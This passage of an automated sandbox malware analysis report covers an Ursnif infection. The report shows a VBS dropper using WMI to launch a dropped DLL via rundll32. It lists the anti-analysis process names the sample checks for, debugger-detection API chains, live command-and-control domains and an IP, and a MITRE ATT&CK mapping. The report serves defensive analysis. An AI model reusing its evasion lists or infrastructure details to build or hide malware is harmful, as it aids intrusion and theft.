            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00C27AB0 push ecx; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00C27E1F push ecx; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_70357A3C push ds; iretd
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_7035922C push edi; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_70354A03 push ds; retf 0000h
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_703562A0 push es; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_70359301 push ebp; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_70356B54 pushfd ; iretd
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_70357CF3 push ecx; retf
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_7035856E push ebp; retf
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_70349D56 push esp; retf
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_70349758 push esp; retf
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_7038FF41 push ss; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_70331A0A LoadLibraryA,GetProcAddress,

            Persistence and Installation Behavior:

            barindex
            Creates processes via WMIShow sources
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\fum.cppJump to dropped file
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\fum.cppJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000017.00000003.607221952.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607028050.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.606994412.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607255595.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607169997.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607202425.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607241313.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607113605.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.735811134.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5236, type: MEMORYSTR
            Deletes itself after installationShow sources
            Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\start[2021.09.09_15-26].vbsJump to behavior
            Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: AUTORUNSC.EXE
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: EMUL.EXE
            Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmpBinary or memory string: SBIECTRL.EXE
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: $FAKEHTTPSERVER.EXE
            Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmpBinary or memory string: APISPY.EXE
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: REGMON.EXEIK
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: WINDBG.EXE
            Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmpBinary or memory string: SBIESVC.EXE
            Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmpBinary or memory string: SCKTOOL.EXE;HQ
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: IDAQ.EXET
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: IMPORTREC.EXE
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: IMUL.EXE.8
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: WINDUMP.EXE
            Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmpBinary or memory string: Q?$SANDBOXIERPCSS.EXEV5
            Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
            Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmpBinary or memory string: PEID.EXE#Z
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: SYSANALYZER.EXEA
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: PROCMON.EXE
            Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmpBinary or memory string: PETOOLS.EXEJ
            Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmpBinary or memory string: OLLYDBG.EXE
            Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmpBinary or memory string: HOOKEXPLORER.EXE
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: NETSNIFFER.EXEK
            Source: wscript.exe, 00000000.00000003.536145532.00000262BFE13000.00000004.00000001.sdmpBinary or memory string: D"WINAPIOVERRIDE32.EXE","ETHEREAL.EXE","MBARUN.EXE","REPUX.EXE","WINDBG.EXE","ETTERCAP.EXE","MDPMON.EXE","RUNSAMPLE.EXE","WINDUMP.EXE","FAKEHTTPSERVER.EXE","MMR.EXE","SAMP1E.EXE","WINSPY.EXE","FAKESERVER.EXE","MMR.EXE","SAMPLE.EXE","WIRESHARK.EXE","FIDDLER.EXE","MULTIPOT.EXE","SANDBOXIECRYPTO.EXE","XXX.EXE","FILEMON.EXE","NETSNIFFER.EXE","SANDBOXIEDCOMLAUNCH.EXE")
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: AUTORUNS.EXE@
            Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmpBinary or memory string: HOOKANAAPP.EXE
            Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: TCPDUMP.EXE
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: FILEMON.EXET
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: A9$BEHAVIORDUMPER.EXEQ
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: IDAG.EXE:V
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: REGSHOT.EXE
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: DUMPCAP.EXE
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: WIRESHARK.EXE
            Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmpBinary or memory string: FORTITRACER.EXEA
            Found evasive API chain (may stop execution after checking system information)Show sources
            Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
            Source: C:\Windows\System32\wscript.exe TID: 4084Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_7034AC85 FindFirstFileExW,
            Source: rundll32.exe, 00000017.00000003.697749575.00000000006A1000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW0
            Source: rundll32.exe, 00000017.00000003.652715194.00000000006D5000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW

            Anti Debugging:

            barindex
            Found API chain indicative of debugger detectionShow sources
            Source: C:\Windows\SysWOW64\rundll32.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_70340D8D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_70331A0A LoadLibraryA,GetProcAddress,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_703483FA GetProcessHeap,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_7034A97E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_70342485 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_7038F0B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_7038EBE6 push dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_7038EFDF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_70340D8D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Benign windows process drops PE filesShow sources
            Source: C:\Windows\System32\wscript.exeFile created: fum.cpp.0.drJump to dropped file
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\SysWOW64\rundll32.exeDomain query: atl.bigbigpoppa.com
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.251.90.253 80
            Source: C:\Windows\SysWOW64\rundll32.exeDomain query: pop.urlovedstuff.com
            Source: rundll32.exe, 00000017.00000002.735668721.0000000003390000.00000002.00020000.sdmpBinary or memory string: Program Manager
            Source: rundll32.exe, 00000017.00000002.735668721.0000000003390000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: rundll32.exe, 00000017.00000002.735668721.0000000003390000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: rundll32.exe, 00000017.00000002.735668721.0000000003390000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
            Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00C26CD6 cpuid
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_703310ED GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_70331F7C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00C26CD6 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: procmon.exe
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: tcpview.exe
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: wireshark.exe
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: avz.exe
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: cports.exe
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: lordpe.exe
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: icesword.exe
            Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmpBinary or memory string: ollydbg.exe
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: regshot.exe

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000017.00000003.607221952.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607028050.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.606994412.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607255595.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607169997.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607202425.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607241313.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607113605.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.735811134.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5236, type: MEMORYSTR

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000017.00000003.607221952.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607028050.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.606994412.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607255595.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607169997.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607202425.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607241313.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607113605.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.735811134.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5236, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation221Path InterceptionProcess Injection12Disable or Modify Tools1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
            Default AccountsScripting121Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsScripting121LSASS MemoryAccount Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsNative API12Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information2Security Account ManagerFile and Directory Discovery1SMB/Windows Admin Shares